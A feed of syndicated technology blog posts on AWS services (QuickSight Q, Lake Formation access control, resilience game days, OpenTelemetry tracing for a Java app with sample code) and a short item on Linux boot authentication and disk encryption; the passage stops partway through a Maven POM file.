Amazon QuickSight Q – Business Intelligence Using Natural Language Questions

2021-09-24 Jeff Barr

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/amazon-quicksight-q-business-intelligence-using-natural-language-questions/

Making sense of business data so that you can get value out of it is worthwhile yet still challenging. Even though the term Business Intelligence (BI) has been around since the mid-1800s (according to Wikipedia) adoption of contemporary BI tools within enterprises is still fairly low.

Amazon QuickSight was designed to make it easier for you to put BI to work in your organization. Announced in 2015 and launched in 2016, QuickSight is a scalable BI service built for the cloud. Since that 2016 launch, we have added many new features, including geospatial visualization and private VPC access in 2017, pay-per-session pricing in 2018, additional APIs (data, dashboard, SPICE, and permissions in 2019), embedded authoring of dashboards & support for auto-naratives in 2020, and Dataset-as-a-Source in 2021.

QuickSight Q is Here
My colleague Harunobu Kameda announced Amazon QuickSight Q (or Q for short) last December and gave you a sneak peek. Today I am happy to announce the general availability of Q, and would like to show you how it works!

To recap, Q is a natural language query tool for the Enterprise Edition of QuickSight. Powered by machine learning, it makes your existing data more accessible, and therefore more valuable. Think of Q as your personal Business Intelligence Engineer or Data Analyst, one that is on call 24 hours a day and always ready to provide you with quick, meaningful results! You get high-quality results in seconds, always shown in an appropriate form.

Behind the scenes, Q uses Natural Language Understanding (NLU) to discover the intent of your question. Aided by models that have been trained to recognize vocabulary and concepts drawn from multiple domains (sales, marketing, retail, HR, advertising, financial services, health care, and so forth), Q is able to answer questions that refer all data sources supported by QuickSight. This includes data from AWS sources such as Amazon Redshift, Amazon Relational Database Service (RDS), Amazon Aurora, Amazon Athena, and Amazon Simple Storage Service (Amazon S3) as well as third party sources & SaaS apps such as Salesforce, Adobe Analytics, ServiceNow, and Excel.

Q in Action
Q is powered by topics, which are generally created by QuickSight Authors for use within an organization (if you are a QuickSight Author, you can learn more about getting started). Topics represent subject areas for questions, and are created interactively. To learn more about the five-step process that Authors use to create a topic, be sure to watch our new video, Tips to Create a Great Q Topic.

To use Q, I simply select a topic (B2B Sales in this case) and enter a question in the Q bar at the top of the page:

Q query --

In addition to the actual results, Q gives me access to explanatory information that I can review to ensure that my question was understood and processed as desired. For example, I can click on sales and learn how Q handles the field:

Detailed information on the use of the sales field.

I can fine-tune each aspect as well; here I clicked Sorted by:

Changing sort order for sales field.

Q chooses an appropriate visual representation for each answer, but I can fine-tune that as well:

Select a new visual type.

Perhaps I want a donut chart instead:

Now that you have seen how Q processes a question and gives you control over how the question is processed & displayed, let’s take a look at a few more questions, starting with “which product sells best in south?”

Question:

Here’s “what is total sales by region and category?” using the vertical stacked bar chart visual:

Total sales by region and catergory.

Behind the Scenes – Q Topics
As I mentioned earlier, Q uses topics to represent a particular subject matter. I click Topics to see the list of topics that I have created or that have been shared with me:

I click B2B Sales to learn more. The Summary page is designed to provide QuickSight Authors with information that they can use to fine-tune the topic:

Info about the B2B Sales Topic.

I can click on the Data tab and learn more about the list of fields that Q uses to answer questions. Each field can have some synonyms or friendly names to make the process of asking questions simpler and more natural:

List of fields for the B2B Sales topic.

I can expand a field (row) to learn more about how Q “understands” and uses the field. I can make changes in order to exercise control over the types of aggregations that make sense for the field, and I can also provide additional semantic information:

Information about the Product Name field.

As an example of providing additional semantic information, if the field’s Semantic Type is Location, I can choose the appropriate sub-type:

The User Activity tab shows me the questions that users are asking of this topic:

User activirty for the B2B Sales topic.

QuickSight Authors can use this tab to monitor user feedback, get a sense of the most common questions, and also use the common questions to drive improvements to the content provided on QuickSight dashboards.

Finally, the Verified answers tab shows the answers that have been manually reviewed and approved:

Things to Know
Here are a couple of things to know about Amazon QuickSight Q:

Pricing – There’s a monthly fee for each Reader and each Author; take a look at the QuickSight Pricing Page for more information.

Regions – Q is available in the US East (N. Virginia), US West (Oregon), US East (Ohio), Europe (Ireland), Europe (Frankfurt), and Europe (London) Regions.

Supported Languages – We are launching with question support in English.

— Jeff;

Integral Ad Science secures self-service data lake using AWS Lake Formation

2021-09-23 Mat Sharpe

Post Syndicated from Mat Sharpe original https://aws.amazon.com/blogs/big-data/integral-ad-science-secures-self-service-data-lake-using-aws-lake-formation/

This post is co-written with Mat Sharpe, Technical Lead, AWS & Systems Engineering from Integral Ad Science.

Integral Ad Science (IAS) is a global leader in digital media quality. The company’s mission is to be the global benchmark for trust and transparency in digital media quality for the world’s leading brands, publishers, and platforms. IAS does this through data-driven technologies with actionable real-time signals and insight.

In this post, we discuss how IAS uses AWS Lake Formation and Amazon Athena to efficiently manage governance and security of data.

The challenge

IAS processes over 100 billion web transactions per day. With strong growth and changing seasonality, IAS needed a solution to reduce cost, eliminate idle capacity during low utilization periods, and maximize data processing speeds during peaks to ensure timely insights for customers.

In 2020, IAS deployed a data lake in AWS, storing data in Amazon Simple Storage Service (Amazon S3), cataloging its metadata in the AWS Glue Data Catalog, ingesting and processing using Amazon EMR, and using Athena to query and analyze the data. IAS wanted to create a unified data platform to meet its business requirements. Additionally, IAS wanted to enable self-service analytics for customers and users across multiple business units, while maintaining critical controls over data privacy and compliance with regulations such as GDPR and CCPA. To accomplish this, IAS needed to securely ingest and organize real-time and batch datasets, as well as secure and govern sensitive customer data.

To meet the dynamic nature of IAS’s data and use cases, the team needed a solution that could define access controls by attribute, such as classification of data and job function. IAS processes significant volumes of data and this continues to grow. To support the volume of data, IAS needed the governance solution to scale in order to create and secure many new daily datasets. This meant IAS could enable self-service access to data from different tools, such as development notebooks, the AWS Management Console, and business intelligence and query tools.

To address these needs, IAS evaluated several approaches, including a manual ticket-based onboarding process to define permissions on new datasets, many different AWS Identity and Access Management (IAM) policies, and an AWS Lambda based approach to automate defining Lake Formation table and column permissions triggered by changes in security requirements and the arrival of new datasets.

Although these approaches worked, they were complex and didn’t support the self-service experience that IAS data analysts required.

Solution overview

IAS selected Lake Formation, Athena, and Okta to solve this challenge. The following architectural diagram shows how the company chose to secure its data lake.

The solution needed to support data producers and consumers in multiple AWS accounts. For brevity, this diagram shows a central data lake producer that includes a set of S3 buckets for raw and processed data. Amazon EMR is used to ingest and process the data, and all metadata is cataloged in the data catalog. The data lake consumer account uses Lake Formation to define fine-grained permissions on datasets shared by the producer account; users logging in through Okta can run queries using Athena and be authorized by Lake Formation.

Lake Formation enables column-level control, and all Amazon S3 access is provisioned via a Lake Formation data access role in the query account, ensuring only that service can access the data. Each business unit with access to the data lake is provisioned with an IAM role that only allows limited access to:

That business unit’s Athena workgroup
That workgroup’s query output bucket
The lakeformation:GetDataAccess API

Because Lake Formation manages all the data access and permissions, the configuration of the user’s role policy in IAM becomes very straightforward. By defining an Athena workgroup per business unit, IAS also takes advantage of assigning per-department billing tags and query limits to help with cost management.

Define a tag strategy

IAS commonly deals with two types of data: data generated by the company and data from third parties. The latter usually includes contractual stipulations on privacy and use.

Some data sets require even tighter controls, and defining a tag strategy is one key way that IAS ensures compliance with data privacy standards. With the tag-based access controls in Lake Formation IAS can define a set of tags within an ontology that is assigned to tables and columns. This ensures users understand available data and whether or not they have access. It also helps IAS manage privacy permissions across numerous tables with new ones added every day.

At a simplistic level, we can define policy tags for class with private and non-private, and for owner with internal and partner.

As we progressed, our tagging ontology evolved to include individual data owners and data sources within our product portfolio.

Apply tags to data assets

After IAS defined the tag ontology, the team applied tags at the database, table, and column level to manage permissions. Tags are inherited, so they only need to be applied at the highest level. For example, IAS applied the owner and class tags at the database level and relied on inheritance to propagate the tags to all the underlying tables and columns. The following diagram shows how IAS activated a tagging strategy to distinguish between internal and partner datasets , while classifying sensitive information within these datasets.

Only a small number of columns contain sensitive information; IAS relied on inheritance to apply a non-private tag to the majority of the database objects and then overrode it with a private tag on a per-column basis.

The following screenshot shows the tags applied to a database on the Lake Formation console.

With its global scale, IAS needed a way to automate how tags are applied to datasets. The team experimented with various options including string matching on column names, but the results were unpredictable in situations where unexpected column names are used (ipaddress vs. ip_address, for example). Ultimately, IAS incorporated metadata tagging into its existing infrastructure as code (IaC) process, which gets applied as part of infrastructure updates.

Define fine-grained permissions

The final piece of the puzzle was to define permission rules to associate with tagged resources. The initial data lake deployment involved creating permission rules for every database and table, with column exclusions as necessary. Although these were generated programmatically, it added significant complexity when the team needed to troubleshoot access issues. With Lake Formation tag-based access controls, IAS reduced hundreds of permission rules down to precisely two rules, as shown in the following screenshot.

When using multiple tags, the expressions are logically ANDed together. The preceding statements permit access only to data tagged non-private and owned by internal.

Tags allowed IAS to simplify permission rules, making it easy to understand, troubleshoot, and audit access. The ability to easily audit which datasets include sensitive information and who within the organization has access to them made it easy to comply with data privacy regulations.

Benefits

This solution provides self-service analytics to IAS data engineers, analysts, and data scientists. Internal users can query the data lake with their choice of tools, such as Athena, while maintaining strong governance and auditing. The new approach using Lake Formation tag-based access controls reduces the integration code and manual controls required. The solution provides the following additional benefits:

Meets security requirements by providing column-level controls for data
Significantly reduces permission complexity
Reduces time to audit data security and troubleshoot permissions
Deploys data classification using existing IaC processes
Reduces the time it takes to onboard data users including engineers, analysts, and scientists

Conclusion

When IAS started this journey, the company was looking for a fully managed solution that would enable self-service analytics while meeting stringent data access policies. Lake Formation provided IAS with the capabilities needed to deliver on this promise for its employees. With tag-based access controls, IAS optimized the solution by reducing the number of permission rules from hundreds down to a few, making it even easier to manage and audit. IAS continues to analyze data using more tools governed by Lake Formation.

About the Authors

Mat Sharpe is the Technical Lead, AWS & Systems Engineering at IAS where he is responsible for the company’s AWS infrastructure and guiding the technical teams in their cloud journey. He is based in New York.

Brian Maguire is a Solution Architect at Amazon Web Services, where he is focused on helping customers build their ideas in the cloud. He is a technologist, writer, teacher, and student who loves learning. Brian is the co-author of the book Scalable Data Streaming with Amazon Kinesis.

Danny Gagne is a Solutions Architect at Amazon Web Services. He has extensive experience in the design and implementation of large-scale high-performance analysis systems, and is the co-author of the book Scalable Data Streaming with Amazon Kinesis. He lives in New York City.

Build Your Own Game Day to Support Operational Resilience

2021-09-23 Lewis Taylor

Post Syndicated from Lewis Taylor original https://aws.amazon.com/blogs/architecture/build-your-own-game-day-to-support-operational-resilience/

Operational resilience is your firm’s ability to provide continuous service through people, processes, and technology that are aware of and adaptive to constant change. Downtime of your mission-critical applications can not only damage your reputation, but can also make you liable to multi-million-dollar financial fines.

One way to test operational resilience is to simulate life-like system failures. An effective way to do this is by running events in your organization known as game days. Game days test systems, processes, and team responses and help evaluate your readiness to react and recover from operational issues. The AWS Well-Architected Framework recommends game days as a key strategy to develop and operate highly resilient systems because they focus not only on technology resilience issues but identify people and process gaps.

This blog post will explain how you can apply game day concepts to your workloads to help achieve a highly resilient workload.

Why does operational resilience matter from a regulatory perspective?

In March 2021, the Bank of England, Prudential Regulation Authority, and Financial Conduct Authority published their Building operational resilience: Feedback to CP19/32 and final rules policy. In this policy, operational resilience refers to a firm’s ability to prevent, adapt, and respond to and return to a steady system state when a disruption occurs. Further, firms are expected to learn and implement process improvements from prior disruptions.

This policy will not apply to everyone. However, across the board if you don’t establish operational resilience strategies, you are likely operating at an increased risk. If you have a service disruption, you may incur lost revenue and reputational damage.

What does it mean to be operationally resilient?

The final policy provides guidance on how firms should achieve operational resilience, which includes but is not limited to the following:

Identify and prioritize services based on the potential of intolerable harm to end consumers or risk to market integrity.
Define appropriate maximum impact tolerance of an important business service. This is reviewed annually using metrics to measure impact tolerance and answers questions like, “How long (in hours) can a service be offline before causing intolerable harm to end consumers?”
Document a complete view of all the aspects required to deliver each important service. This includes people, processes, technology, facilities, and information (resources). Firms should also test their ability to remain within the impact tolerances and provide assurance of resilience along with areas that need to be addressed.

What is a game day?

The AWS Well-Architected Framework defines a game day as follows:

“A game day simulates a failure or event to test systems, processes, and team responses. The purpose is to actually perform the actions the team would perform as if an exceptional event happened. These should be conducted regularly so that your team builds “muscle memory” on how to respond. Your game days should cover the areas of operations, security, reliability, performance, and cost.

In AWS, your game days can be carried out with replicas of your production environment using AWS CloudFormation. This enables you to test in a safe environment that resembles your production environment closely.”

Running game days that simulate system failure helps your organization evaluate and build operational resilience.

How can game days help build operational resilience?

Running a game day alone is not sufficient to ensure operational resilience. However, by navigating the following process to set up and perform a game day, you will establish a best practice-based approach for operating resilient systems.

Stage 1 – Identify key services

As part of setting up a game day event, you will catalog and identify business-critical services.

Game days are performed to test services where operational failure could result in significant financial, customer, and/or reputational impact to the firm. Game days can also evaluate other key factors, like the impact of a failure on the wider market where your firm operates.

For example, a firm may identify its digital banking mobile application from which their customers can initiate payments as one of its important business services.

Stage 2 – Map people, process, and technology supporting the business service

Game days are holistic events. To get a full picture of how the different aspects of your workload operate together, you’ll generate a detailed map of people and processes as they interact and operate the technical and non-technical components of the system. This mapping also helps your end consumers understand how you will provide them reliable support during a failure.

Stage 3 – Define and perform failure scenarios

Systems fail, and failures often happen when a system is operating at scale because various services working together can introduce complexity. To ensure operational resilience, you must understand how systems react and adapt to failures. To do this, you’ll identify and perform failure scenarios so you can understand how your systems will react and adapt and build “muscle memory” for actual events.

AWS builds to guard against outages and incidents, and accounts for them in the design of AWS services—so when disruptions do occur, their impact on customers and the continuity of services is as minimal as possible. At AWS, we employ compartmentalization throughout our infrastructure and services. We have multiple constructs that provide different levels of independent, redundant components.

Stage 4 – Observe and document people, process, and technology reactions

In running a failure scenario, you’ll observe how technological and non-technological components react to and recover from failure. This helps you identify failures and fix them as they cascade through impacted components across your workload. This also helps identify technical and operational challenges that might not otherwise be obvious.

Stage 5 – Conduct lessons learned exercises

Game days generate information on people, processes, and technology and also capture data on customer impact, incident response and remediation timelines, contributing factors, and corrective actions. By incorporating these data points into the system design process, you can implement continuous resilience for critical systems.

How to run your own game day in AWS

You may have heard of AWS GameDay events. This is an AWS organized event for our customers. In this team-based event, AWS provides temporary AWS accounts running fictional systems. Failures are injected into these systems and teams work together on completing challenges and improving the system architecture.

However, the method and tooling and principles we use to conduct AWS GameDays are agnostic and can be applied to your systems using the following services:

AWS Fault Injection Simulator is a fully managed service that runs fault injection experiments on AWS, which makes it easier to improve an application’s performance, observability, and resiliency.
Amazon CloudWatch is a monitoring and observability service that provides you with data and actionable insights to monitor your applications, respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health.
AWS X-Ray helps you analyze and debug production and distributed applications (such as those built using a microservices architecture). X-Ray helps you understand how your application and its underlying services are performing to identify and troubleshoot the root cause of performance issues and errors.

Please note you are not limited to the tools listed for simulating failure scenarios. For complete coverage of failure scenarios, we encourage you to explore additional tools and strategies.

Figure 1 shows a reference architecture example that demonstrates conducting a game day for an Open Banking implementation.

Figure 1. Game day reference architecture example

Game day operators use Fault Injection Simulator to catalog and perform failure scenarios to be included in your game day. For example, in our Open Banking use case in Figure 1, a failure scenario might be for the business API functions servicing Open Banking requests to abruptly stop working. You can also combine such simple failure scenarios into a more complex one with failures injected across multiple components of the architecture.

Game day participants use CloudWatch, X-Ray, and their own custom observability and monitoring tooling to identify failures as they cascade through systems.

As you go through the process of identifying, communicating, and fixing issues, you’ll also document impact of failures on end-users. From there, you’ll generate lessons learned to holistically improve your workload’s resilience.

Conclusion

In this blog, we discussed the significance of ensuring operational resilience. We demonstrated how to set up game days and how they can supplement your efforts to ensure operational resilience. We discussed how using AWS services such as Fault Injection Simulator, X-Ray, and CloudWatch can be used to facilitate and implement game day failure scenarios.

Ready to get started? For more information, check out our AWS Fault Injection Simulator User Guide.

Related information:

For AWS guidance on implementing operational resilience in the financial sector check out this whitepaper Amazon Web Services’ Approach to Operational Resilience in the Financial Sector & Beyond

AWS Cloud Builders – Career Transformation & Personal Growth

2021-09-23 Jeff Barr

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-cloud-builders-career-transformation-personal-growth/

Long-time readers of this blog know that I firmly believe in the power of education to improve lives. AWS Training and Certification equips people and organizations around the world with cloud computing education to build and validate cloud computing skills. With demand for cloud skills and experience at an all-time high, there’s never been a better time to get started.

On the training side you have a multitude of options for classroom and digital training, including offerings from AWS Training Partners. After you have been trained and have gained some experience, you can prepare for, schedule, and earn one or more of the eleven AWS Certifications.

I encourage you to spend some time watching our new AWS Cloud Builder Career Stories videos. In these videos you will hear some AWS Training and Certification success stories:

Uri Parush became a Serverless Architect and rode a wave of innovation.
David Webster became an AWS Technical Practice Lead after dreaming of becoming an inventor.
Karolina Boboli retrained as a Cloud Architect after a career as an accountant.
Florian Clanet reminisces about putting his first application into service and how it reminded him of designing lighting for a high school play.
Veliswa Boya trained for her AWS Certification and became the first female AWS Developer Advocate in Africa.
Karen Tovmasyan wrote his first book about cloud and remembered his first boxing match.
Sara Alasfoor built her first AWS data analytics solution and learned that she could tackle any obstacle.
Bruno Amaro Almedia was happy to be thanked for publishing his first article about AWS after earning twelve AWS certifications.
Nicola Racco was terrified and exhilarated when he released his first serverless project.

I hope that you enjoy the stories, and that they inspire you to embark on a learning journey of your own!

— Jeff;

Poettering: Authenticated Boot and Disk Encryption on Linux

2021-09-23

Post Syndicated from original https://lwn.net/Articles/870194/rss

Here’s a
lengthy missive from Lennart Poettering taking Linux distributors to
task for inadequately protecting systems from physical attacks.

So, does the scheme so far implemented by generic Linux
distributions protect us against the latter two scenarios?
Unfortunately not at all. Because distributions set up disk
encryption the way they do, and only bind it to a user password, an
attacker can easily duplicate the disk, and then attempt to brute
force your password. What’s worse: since code authentication ends
at the kernel — and the initrd is not authenticated anymore —,
backdooring is trivially easy: an attacker can change the initrd
any way they want, without having to fight any kind of protections.

The article contains a lot of suggestions for how to do things better.

New for AWS Distro for OpenTelemetry – Tracing Support is Now Generally Available

2021-09-23 Danilo Poccia

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/new-for-aws-distro-for-opentelemetry-tracing-support-is-now-generally-available/

Last year before re:Invent, we introduced the public preview of AWS Distro for OpenTelemetry, a secure distribution of the OpenTelemetry project supported by AWS. OpenTelemetry provides tools, APIs, and SDKs to instrument, generate, collect, and export telemetry data to better understand the behavior and the performance of your applications. Yesterday, upstream OpenTelemetry announced tracing stability milestone for its components. Today, I am happy to share that support for traces is now generally available in AWS Distro for OpenTelemetry.

Using OpenTelemetry, you can instrument your applications just once and then send traces to multiple monitoring solutions.

You can use AWS Distro for OpenTelemetry to instrument your applications running on Amazon Elastic Compute Cloud (Amazon EC2), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (EKS), and AWS Lambda, as well as on premises. Containers running on AWS Fargate and orchestrated via either ECS or EKS are also supported.

You can send tracing data collected by AWS Distro for OpenTelemetry to AWS X-Ray, as well as partner destinations such as:

AppDynamics, Dynatrace, Grafana, Honeycomb, Lightstep, NewRelic, and SumoLogic – which support OpenTelemetry Protocol (OTLP) exporters natively.
Datadog, Logz.io, Splunk – which have their own exporters.

You can use auto-instrumentation agents to collect traces without changing your code. Auto-instrumentation is available today for Java and Python applications. Auto-instrumentation support for Python currently only covers the AWS SDK. You can instrument your applications using other programming languages (such as Go, Node.js, and .NET) with the OpenTelemetry SDKs.

Let’s see how this works in practice for a Java application.

Visualizing Traces for a Java Application Using Auto-Instrumentation
I create a simple Java application that shows the list of my Amazon Simple Storage Service (Amazon S3) buckets and my Amazon DynamoDB tables:

package com.example.myapp;

import software.amazon.awssdk.regions.Region;
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.*;
import software.amazon.awssdk.services.dynamodb.model.DynamoDbException;
import software.amazon.awssdk.services.dynamodb.model.ListTablesResponse;
import software.amazon.awssdk.services.dynamodb.model.ListTablesRequest;
import software.amazon.awssdk.services.dynamodb.DynamoDbClient;

import java.util.List;

/**
 * Hello world!
 *
 */
public class App {

    public static void listAllTables(DynamoDbClient ddb) {

        System.out.println("DynamoDB Tables:");

        boolean moreTables = true;
        String lastName = null;

        while (moreTables) {
            try {
                ListTablesResponse response = null;
                if (lastName == null) {
                    ListTablesRequest request = ListTablesRequest.builder().build();
                    response = ddb.listTables(request);
                } else {
                    ListTablesRequest request = ListTablesRequest.builder().exclusiveStartTableName(lastName).build();
                    response = ddb.listTables(request);
                }

                List<String> tableNames = response.tableNames();

                if (tableNames.size() > 0) {
                    for (String curName : tableNames) {
                        System.out.format("* %s\n", curName);
                    }
                } else {
                    System.out.println("No tables found!");
                    System.exit(0);
                }

                lastName = response.lastEvaluatedTableName();
                if (lastName == null) {
                    moreTables = false;
                }
            } catch (DynamoDbException e) {
                System.err.println(e.getMessage());
                System.exit(1);
            }
        }

        System.out.println("Done!\n");
    }

    public static void listAllBuckets(S3Client s3) {

        System.out.println("S3 Buckets:");

        ListBucketsRequest listBucketsRequest = ListBucketsRequest.builder().build();
        ListBucketsResponse listBucketsResponse = s3.listBuckets(listBucketsRequest);
        listBucketsResponse.buckets().stream().forEach(x -> System.out.format("* %s\n", x.name()));

        System.out.println("Done!\n");
    }

    public static void listAllBucketsAndTables(S3Client s3, DynamoDbClient ddb) {
        listAllBuckets(s3);
        listAllTables(ddb);
    }

    public static void main(String[] args) {

        Region region = Region.EU_WEST_1;

        S3Client s3 = S3Client.builder().region(region).build();
        DynamoDbClient ddb = DynamoDbClient.builder().region(region).build();

        listAllBucketsAndTables(s3, ddb);

        s3.close();
        ddb.close();
    }
}

I package the application using Apache Maven. Here’s the Project Object Model (POM) file managing dependencies such as the AWS SDK for Java 2.x that I use to interact with S3 and DynamoDB:

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>
  <groupId>com.example.myapp</groupId>
  <artifactId>myapp</artifactId>
  <packaging>jar</packaging>
  <version>1.0-SNAPSHOT</version>
  <name>myapp</name>
  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>software.amazon.awssdk</groupId>
        <artifactId>bom</artifactId>
        <version>2.17.38</version>
        <type>pom</type>
        <scope>import</scope>
      </dependency>
    </dependencies>
  </dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>software.amazon.awssdk</groupId>
      <artifactId>s3</artifactId>
    </dependency>
    <dependency>
      <groupId>software.amazon.awssdk</groupId>
      <artifactId>dynamodb</artifactId>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.8.1</version>
        <configuration>
          <source>8</source>
          <target>8</target>
        </configuration>
      </plugin>
      <plugin>
        <artifactId>maven-assembly-plugin</artifactId>
        <configuration>
          <archive>
            <manifest>
              <mainClass>com.example.myapp.App</mainClass>
            </manifest>
          </archive>
          <descriptorRefs>
            <descriptorRef>jar-with-dependencies</descriptorRef>
          </descriptorRefs>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>

I use Maven to create an executable Java Archive (JAR) file that includes all dependencies:

$ mvn clean compile assembly:single

To run the application and get tracing data, I need two components:

The AWS Distro for OpenTelemetry Auto-Instrumentation Agent for Java, a Java agent that can be attached to any Java 8+ application to capture telemetry from a number of popular libraries and frameworks, including the AWS SDK.
The AWS Distro for OpenTelemetry Collector, an executable that can receive, process, and export telemetry data to monitoring destinations.

In one terminal, I run the AWS Distro for OpenTelemetry Collector using Docker:

$ docker run --rm -p 4317:4317 -p 55680:55680 -p 8889:8888 \
         -e AWS_REGION=eu-west-1 \
         -e AWS_PROFILE=default \
         -v ~/.aws:/root/.aws \
         --name awscollector public.ecr.aws/aws-observability/aws-otel-collector:latest

The collector is now ready to receive traces and forward them to a monitoring platform. By default, the AWS Distro for OpenTelemetry Collector sends traces to AWS X-Ray. I can change the exporter or add more exporters by editing the collector configuration. For example, I can follow the documentation to configure OLTP exporters to send telemetry data using the OLTP protocol. In the documentation, I also find how to configure other partner destinations. [[ It would be great it we had a link for the partner section, I can find only links to a specific partner ]]

I download the latest version of the AWS Distro for OpenTelemetry Auto-Instrumentation Java Agent. Now, I run my application and use the agent to capture telemetry data without having to add any specific instrumentation the code. In the OTEL_RESOURCE_ATTRIBUTES environment variable I set a name and a namespace for the service: [[ Are service.name and service.namespace being used by X-Ray? I couldn’t find them in the service map ]]

$ OTEL_RESOURCE_ATTRIBUTES=service.name=MyApp,service.namespace=MyTeam \
  java -javaagent:otel/aws-opentelemetry-agent.jar \
       -jar myapp/target/myapp-1.0-SNAPSHOT-jar-with-dependencies.jar

As expected, I get the list of my S3 buckets globally and of the DynamoDB tables in the Region.

To generate more tracing data, I run the previous command a few times. Each time I run the application, telemetry data is collected by the agent and sent to the collector. The collector buffers the data and then sends it to the configured exporters. By default, it is sending traces to X-Ray.

Now, I look at the service map in the AWS X-Ray console to see my application’s interactions with other services:

And there they are! Without any change in the code, I see my application’s calls to the S3 and DynamoDB APIs. There were no errors, and all the circles are green. Inside the circles, I find the average latency of the invocations and the number of transactions per minute.

Adding Spans to a Java Application
The information automatically collected can be improved by providing more information with the traces. For example, I might have interactions with the same service in different parts of my application, and it would be useful to separate those interactions in the service map. In this way, if there is an error or high latency, I would know which part of my application is affected.

One way to do so is to use spans or segments. A span represents a group of logically related activities. For example, the listAllBucketsAndTables method is performing two operations, one with S3 and one with DynamoDB. I’d like to group them together in a span. The quickest way with OpenTelemetry is to add the @WithSpan annotation to the method. Because the result of a method usually depends on its arguments, I also use the @SpanAttribute annotation to describe which arguments in the method invocation should be automatically added as attributes to the span.

@WithSpan
    public static void listAllBucketsAndTables(@SpanAttribute("title") String title, S3Client s3, DynamoDbClient ddb) {

        System.out.println(title);

        listAllBuckets(s3);
        listAllTables(ddb);
    }

To be able to use the @WithSpan and @SpanAttribute annotations, I need to import them into the code and add the necessary OpenTelemetry dependencies to the POM. All these changes are based on the OpenTelemetry specifications and don’t depend on the actual implementation that I am using, or on the tool that I will use to visualize or analyze the telemetry data. I have only to make these changes once to instrument my application. Isn’t that great?

To better see how spans work, I create another method that is running the same operations in reverse order, first listing the DynamoDB tables, then the S3 buckets:

    @WithSpan
    public static void listTablesFirstAndThenBuckets(@SpanAttribute("title") String title, S3Client s3, DynamoDbClient ddb) {

        System.out.println(title);

        listAllTables(ddb);
        listAllBuckets(s3);
    }

The application is now running the two methods (listAllBucketsAndTables and listTablesFirstAndThenBuckets) one after the other. For simplicity, here’s the full code of the instrumented application:

package com.example.myapp;

import software.amazon.awssdk.regions.Region;
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.*;
import software.amazon.awssdk.services.dynamodb.model.DynamoDbException;
import software.amazon.awssdk.services.dynamodb.model.ListTablesResponse;
import software.amazon.awssdk.services.dynamodb.model.ListTablesRequest;
import software.amazon.awssdk.services.dynamodb.DynamoDbClient;

import java.util.List;

import io.opentelemetry.extension.annotations.SpanAttribute;
import io.opentelemetry.extension.annotations.WithSpan;

/**
 * Hello world!
 *
 */
public class App {

    public static void listAllTables(DynamoDbClient ddb) {

        System.out.println("DynamoDB Tables:");

        boolean moreTables = true;
        String lastName = null;

        while (moreTables) {
            try {
                ListTablesResponse response = null;
                if (lastName == null) {
                    ListTablesRequest request = ListTablesRequest.builder().build();
                    response = ddb.listTables(request);
                } else {
                    ListTablesRequest request = ListTablesRequest.builder().exclusiveStartTableName(lastName).build();
                    response = ddb.listTables(request);
                }

                List<String> tableNames = response.tableNames();

                if (tableNames.size() > 0) {
                    for (String curName : tableNames) {
                        System.out.format("* %s\n", curName);
                    }
                } else {
                    System.out.println("No tables found!");
                    System.exit(0);
                }

                lastName = response.lastEvaluatedTableName();
                if (lastName == null) {
                    moreTables = false;
                }
            } catch (DynamoDbException e) {
                System.err.println(e.getMessage());
                System.exit(1);
            }
        }

        System.out.println("Done!\n");
    }

    public static void listAllBuckets(S3Client s3) {

        System.out.println("S3 Buckets:");

        ListBucketsRequest listBucketsRequest = ListBucketsRequest.builder().build();
        ListBucketsResponse listBucketsResponse = s3.listBuckets(listBucketsRequest);
        listBucketsResponse.buckets().stream().forEach(x -> System.out.format("* %s\n", x.name()));

        System.out.println("Done!\n");
    }

    @WithSpan
    public static void listAllBucketsAndTables(@SpanAttribute("title") String title, S3Client s3, DynamoDbClient ddb) {

        System.out.println(title);

        listAllBuckets(s3);
        listAllTables(ddb);

    }

    @WithSpan
    public static void listTablesFirstAndThenBuckets(@SpanAttribute("title") String title, S3Client s3, DynamoDbClient ddb) {

        System.out.println(title);

        listAllTables(ddb);
        listAllBuckets(s3);

    }

    public static void main(String[] args) {

        Region region = Region.EU_WEST_1;

        S3Client s3 = S3Client.builder().region(region).build();
        DynamoDbClient ddb = DynamoDbClient.builder().region(region).build();

        listAllBucketsAndTables("My S3 buckets and DynamoDB tables", s3, ddb);
        listTablesFirstAndThenBuckets("My DynamoDB tables first and then S3 bucket", s3, ddb);

        s3.close();
        ddb.close();
    }
}

And here’s the updated POM that includes the additional OpenTelemetry dependencies:

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>
  <groupId>com.example.myapp</groupId>
  <artifactId>myapp</artifactId>
  <packaging>jar</packaging>
  <version>1.0-SNAPSHOT</version>
  <name>myapp</name>
  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>software.amazon.awssdk</groupId>
        <artifactId>bom</artifactId>
        <version>2.16.60</version>
        <type>pom</type>
        <scope>import</scope>
      </dependency>
    </dependencies>
  </dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
